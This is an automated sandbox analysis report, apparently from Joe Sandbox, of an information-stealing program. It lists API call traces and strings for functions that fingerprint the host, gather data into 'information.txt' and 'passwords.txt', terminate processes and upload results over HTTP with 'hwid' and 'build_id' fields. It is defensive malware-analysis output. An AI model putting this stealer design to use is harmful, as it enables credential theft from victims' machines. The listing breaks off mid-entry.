Part of subcall function 0040E89E: HeapAlloc.KERNEL32(00000000,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004245CC,00000000,?), ref: 0040E8B9
Part of subcall function 0040E89E: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040E8D7
Part of subcall function 0040E89E: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040E8F3

Part of subcall function 0040E93A: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040E98D
Part of subcall function 0040E93A: wsprintfA.USER32 ref: 0040E9D3

Part of subcall function 0040E907: GetSystemInfo.KERNEL32(00000000), ref: 0040E914
Part of subcall function 0040E907: wsprintfA.USER32 ref: 0040E929

Part of subcall function 0040EA07: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000,?,Windows: ,00000000,?,0042451C,00000000,?,Work Dir: In memory,00000000,?,00424504), ref: 0040EA15
Part of subcall function 0040EA07: HeapAlloc.KERNEL32(00000000), ref: 0040EA1C
Part of subcall function 0040EA07: GlobalMemoryStatusEx.KERNEL32 ref: 0040EA3C
Part of subcall function 0040EA07: wsprintfA.USER32 ref: 0040EA62

Part of subcall function 0040EA70: _EH_prolog.MSVCRT ref: 0040EA75
Part of subcall function 0040EA70: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 0040EB36

Part of subcall function 0040EDA7: _EH_prolog.MSVCRT ref: 0040EDAC
Part of subcall function 0040EDA7: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040EDE7
Part of subcall function 0040EDA7: Process32First.KERNEL32(00000000,00000128), ref: 0040EDF8
Part of subcall function 0040EDA7: Process32Next.KERNEL32(?,00000128), ref: 0040EE60
Part of subcall function 0040EDA7: CloseHandle.KERNEL32(?,?,00000000), ref: 0040EE6D

Part of subcall function 0040EB55: _EH_prolog.MSVCRT ref: 0040EB5A
Part of subcall function 0040EB55: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004241CF,00000000,00000000), ref: 0040EBA2

Part of subcall function 0040EB55: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040EBEC
Part of subcall function 0040EB55: wsprintfA.USER32 ref: 0040EC16
Part of subcall function 0040EB55: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040EC33
Part of subcall function 0040EB55: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040EC5D
Part of subcall function 0040EB55: lstrlen.KERNEL32(?), ref: 0040EC72
Part of subcall function 0040EB55: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00424200), ref: 0040ECF2

lstrlen.KERNEL32(00000000,00000000,?,00424644,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00424634), ref: 00413F04

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD

Strings

Work Dir: In memory, xrefs: 004134E2
Keyboard Languages: , xrefs: 0041386F
Processor: , xrefs: 00413A55
Cores: , xrefs: 00413AE6
[Hardware], xrefs: 00413A25
Version: , xrefs: 0041315E
MachineID: , xrefs: 0041329F
V, xrefs: 00413F38
Install Date: , xrefs: 004135B5
Path: , xrefs: 00413446
Threads: , xrefs: 00413B6B
information.txt, xrefs: 00413F1F
HWID: , xrefs: 004133B2
GUID: , xrefs: 0041331E
Windows: , xrefs: 00413536
Date: , xrefs: 00413220
VideoCard: , xrefs: 00413C75
TimeZone: , xrefs: 00413994
RAM: , xrefs: 00413BF0
User Name: , xrefs: 0041375C
Local Time: , xrefs: 0041390F
[Software], xrefs: 00413DFD
Computer Name: , xrefs: 004136DD
[Processes], xrefs: 00413D51
Display Resolution: , xrefs: 004137DB
AV: , xrefs: 00413649

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $V$Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 722754166-310184570
Opcode ID: 811b7d68a6cfe72faf9ee324c155fb842fa9fd7ce8a615f2435f4a0874e4aef8
Instruction ID: 5f778280f23de2a4fdb259b6ccf19d94640144d39d4e386dcb251b8ba5580ae4
Opcode Fuzzy Hash: 811b7d68a6cfe72faf9ee324c155fb842fa9fd7ce8a615f2435f4a0874e4aef8
Instruction Fuzzy Hash: 1BA22371800288E9DB05E7E2C956BEEBF785F14308F1444AEA541732C2DF782B59DBB6

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9EA Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 275
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040B9EF

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?,00423B76,00000000), ref: 0040BAAD
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040BB0E
RtlAllocateHeap.NTDLL(00000000), ref: 0040BB15
lstrlen.KERNEL32(00000000,00000000), ref: 0040BBA6
lstrcat.KERNEL32(?), ref: 0040BBBE
lstrcat.KERNEL32(?,00000000), ref: 0040BBD0
lstrcat.KERNEL32(?,00423B7C), ref: 0040BBDE
lstrcat.KERNEL32(?,00000000), ref: 0040BBF0
lstrcat.KERNEL32(?,00423B80), ref: 0040BBFE
lstrcat.KERNEL32(?), ref: 0040BC0D
lstrcat.KERNEL32(?,00000000), ref: 0040BC1F
lstrcat.KERNEL32(?,00423B84), ref: 0040BC2D
lstrcat.KERNEL32(?), ref: 0040BC3C
lstrcat.KERNEL32(?,00000000), ref: 0040BC4E
lstrcat.KERNEL32(?,00423B88), ref: 0040BC5C
lstrcat.KERNEL32(?), ref: 0040BC6B
lstrcat.KERNEL32(?,00000000), ref: 0040BC7D
lstrcat.KERNEL32(?,00423B8C), ref: 0040BC8B
lstrcat.KERNEL32(?,00423B90), ref: 0040BC99
lstrlen.KERNEL32(?), ref: 0040BCCD
memset.MSVCRT ref: 0040BD20
DeleteFileA.KERNEL32(00000000), ref: 0040BD4D

Part of subcall function 0040635E: _EH_prolog.MSVCRT ref: 00406363
Part of subcall function 0040635E: memcmp.MSVCRT ref: 00406389
Part of subcall function 0040635E: memset.MSVCRT ref: 004063B8
Part of subcall function 0040635E: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 004063ED

Strings

passwords.txt, xrefs: 0040BCDF

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
String ID: passwords.txt
API String ID: 3298853120-347816968
Opcode ID: 8454bc0e9691c7399795ad14da3f904abbb74f93ebf0461abe4fa8449db9faa8
Instruction ID: eacfe064167263d56a5f39260bca9470ec76c25b5eb96d500bc3926372bb56e9
Opcode Fuzzy Hash: 8454bc0e9691c7399795ad14da3f904abbb74f93ebf0461abe4fa8449db9faa8
Instruction Fuzzy Hash: 3DB13B71800109EFDB05EBE1ED4AAEEBB75FF14308F14482AF411721E2DB786A25DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00412358 Relevance: 41.1, APIs: 12, Strings: 11, Instructions: 899
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0041235D

Part of subcall function 00411FF8: _EH_prolog.MSVCRT ref: 00411FFD

Part of subcall function 0040E35E: lstrlen.KERNEL32(?,00000000,?,00415304,004244B3,004244B2,00000000,00000000,?,00415CB7), ref: 0040E367
Part of subcall function 0040E35E: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E39B

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041253E
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004125D4

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00411A77: _EH_prolog.MSVCRT ref: 00411A7C
Part of subcall function 00411A77: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00411ADA

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412715
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004127AB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004128EC

Part of subcall function 00411B64: _EH_prolog.MSVCRT ref: 00411B69
Part of subcall function 00411B64: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00411BEB
Part of subcall function 00411B64: lstrlen.KERNEL32(00000000), ref: 00411C02
Part of subcall function 00411B64: StrStrA.SHLWAPI(00000000,00000000), ref: 00411C29
Part of subcall function 00411B64: lstrlen.KERNEL32(00000000), ref: 00411C3E
Part of subcall function 00411B64: lstrlen.KERNEL32(00000000), ref: 00411C59

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412982
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412AC3
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412B59
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412C9A
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412D2A
Sleep.KERNEL32(0000EA60), ref: 00412D39

Strings

", xrefs: 00412ED7
ERROR, xrefs: 004125C6
ERROR, xrefs: 00412974
ERROR, xrefs: 004128DE
ERROR, xrefs: 00412B4B
ERROR, xrefs: 00412C8C
ERROR, xrefs: 00412530
ERROR, xrefs: 0041279D
ERROR, xrefs: 00412D1C
ERROR, xrefs: 00412707
ERROR, xrefs: 00412AB5

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpylstrlen$Sleep
String ID: "$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 1345713276-2213018930
Opcode ID: 43269324f860c2ae06b9e27c795a8b236ef888555ccc1246de3ab1475a4c26aa
Instruction ID: d01c531e1e47b4cc6a2d22cd096bc4d660d73e225f58ccdc42e790240094469d
Opcode Fuzzy Hash: 43269324f860c2ae06b9e27c795a8b236ef888555ccc1246de3ab1475a4c26aa
Instruction Fuzzy Hash: 27726070D00248EADB04E7EAC94ABDDBFB8AF15304F1444AEE445B32C2DB785B58D766

Uniqueness

Uniqueness Score: -1.00%

Function 00403AA8 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 513
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00403AAD

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00403A07: _EH_prolog.MSVCRT ref: 00403A0C
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
Part of subcall function 00403A07: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
Part of subcall function 00403A07: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403B58
StrCmpCA.SHLWAPI(?), ref: 00403B6F

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403CF7
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D31
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403D55

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

lstrlen.KERNEL32(00000000,00000000,?,?,?,?,004239A5,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 00404031
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040404A
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 0040405B
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040AF
InternetCloseHandle.WININET(00000000), ref: 004040BA
InternetCloseHandle.WININET(?), ref: 004040CF
InternetCloseHandle.WININET(?), ref: 004040D8

Strings

------, xrefs: 00403EAA
!, xrefs: 00404099
hwid, xrefs: 00403E03
------, xrefs: 00403D5B
", xrefs: 00403F7C
------, xrefs: 00403BF1
", xrefs: 00403E2D
build_id, xrefs: 00403F52

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: !$"$"$------$------$------$build_id$hwid
API String ID: 1139859944-3346224549
Opcode ID: d73f38dbe927608ab9ea402c11925cc2cabc379170bec97884acee1ca15903fb
Instruction ID: 489e92a55be8e718c41cf12358fcc240b45c9422e42718dc0d0a46bd63b7c0da
Opcode Fuzzy Hash: d73f38dbe927608ab9ea402c11925cc2cabc379170bec97884acee1ca15903fb
Instruction Fuzzy Hash: A722517280014CEADB05EBE6C986AEEBFB8AF15304F14446EF501732C2DB781B59DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004066F1 Relevance: 33.5, APIs: 22, Instructions: 492
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004066F6

Part of subcall function 0040E4FC: StrCmpCA.SHLWAPI(?,00406717,?,00406717,00000000), ref: 0040E505

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?,00423B7F,00000000), ref: 0040682A

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 0040FAD8: _EH_prolog.MSVCRT ref: 0040FADD
Part of subcall function 0040FAD8: memset.MSVCRT ref: 0040FAFF
Part of subcall function 0040FAD8: OpenProcess.KERNEL32(00001001,00000000,?,?,00000000), ref: 0040FB86
Part of subcall function 0040FAD8: TerminateProcess.KERNEL32(00000000,00000000), ref: 0040FB94
Part of subcall function 0040FAD8: CloseHandle.KERNEL32(00000000), ref: 0040FB9B

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406A1C
RtlAllocateHeap.NTDLL(00000000), ref: 00406A23
lstrcat.KERNEL32(?,00000000), ref: 00406B41
lstrcat.KERNEL32(?,00423BBC), ref: 00406B4F
lstrcat.KERNEL32(?,00000000), ref: 00406B61
lstrcat.KERNEL32(?,00423BC0), ref: 00406B6F
lstrlen.KERNEL32(?), ref: 00406CB6
lstrlen.KERNEL32(?), ref: 00406CC4

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

memset.MSVCRT ref: 00406D1C
DeleteFileA.KERNEL32(00000000), ref: 00406D41

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcat$Processlstrcpylstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
String ID:
API String ID: 36237839-0
Opcode ID: 8bf1e23e095b9cb6b632fcb1a1e4078704d330192dba237c037de93d086178dc
Instruction ID: b1f6e28383e3fff9692a0d78c5777136586142c3e79fd42dd068571671610143
Opcode Fuzzy Hash: 8bf1e23e095b9cb6b632fcb1a1e4078704d330192dba237c037de93d086178dc
Instruction Fuzzy Hash: BE122C71800148EADF05EBA6DD46AEDBB79AF14308F14446EF402731D2EF782B29DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040F242 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 146memorycomtimeCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F247
CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000), ref: 0040F257
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,0042451C), ref: 0040F268
CoCreateInstance.OLE32(00424EE8,00000000,00000001,00424E18,?,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000), ref: 0040F282
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,0042451C,00000000), ref: 0040F2B8
VariantInit.OLEAUT32(?), ref: 0040F313

Part of subcall function 0040F1A8: CoCreateInstance.OLE32(00424C98,00000000,00000001,00424388,00000000,?), ref: 0040F1C8
Part of subcall function 0040F1A8: SysAllocString.OLEAUT32(00000000), ref: 0040F1D6
Part of subcall function 0040F1A8: _wtoi64.MSVCRT ref: 0040F218
Part of subcall function 0040F1A8: SysFreeString.OLEAUT32(?), ref: 0040F22D
Part of subcall function 0040F1A8: SysFreeString.OLEAUT32(00000000), ref: 0040F230

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F34A
GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F356
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000,?,00424504), ref: 0040F35D
VariantClear.OLEAUT32(?), ref: 0040F39F
wsprintfA.USER32 ref: 0040F389

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Strings

%d/%d/%d %d:%d:%d, xrefs: 0040F383
Unknown, xrefs: 0040F3AE
ROOT\CIMV2, xrefs: 0040F295
Select * From Win32_OperatingSystem, xrefs: 0040F2C8
Unknown, xrefs: 0040F3A7
InstallDate, xrefs: 0040F325
WQL, xrefs: 0040F2CD

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prologInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
API String ID: 3912155974-2016369993
Opcode ID: 480ecd5e6308617b09b7f2bb83f1af69c0fa1306002764de5b093bb9eba1a589
Instruction ID: 8d430aa98e8fbb6da78459b6686bb4d7d24871abc0dfaafc268d7e8e302d3495
Opcode Fuzzy Hash: 480ecd5e6308617b09b7f2bb83f1af69c0fa1306002764de5b093bb9eba1a589
Instruction Fuzzy Hash: 07413B71A01229BBDB20DB96DC49EEF7BBCFF49750F104126F905B6180D7789641CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410264 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 325stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410269
strtok_s.MSVCRT ref: 0041029A
StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 00410332

Part of subcall function 0040E35E: lstrlen.KERNEL32(?,00000000,?,00415304,004244B3,004244B2,00000000,00000000,?,00415CB7), ref: 0040E367
Part of subcall function 0040E35E: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E39B

lstrcpy.KERNEL32(?,?), ref: 004103E9
lstrcpy.KERNEL32(?,00000000), ref: 00410425
lstrcpy.KERNEL32(?,00000000), ref: 0041046C
lstrcpy.KERNEL32(?,00000000), ref: 004104B3
lstrcpy.KERNEL32(?,00000000), ref: 004104FA
strtok_s.MSVCRT ref: 0041065D

Strings

false, xrefs: 0041034C
true, xrefs: 0041032A

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
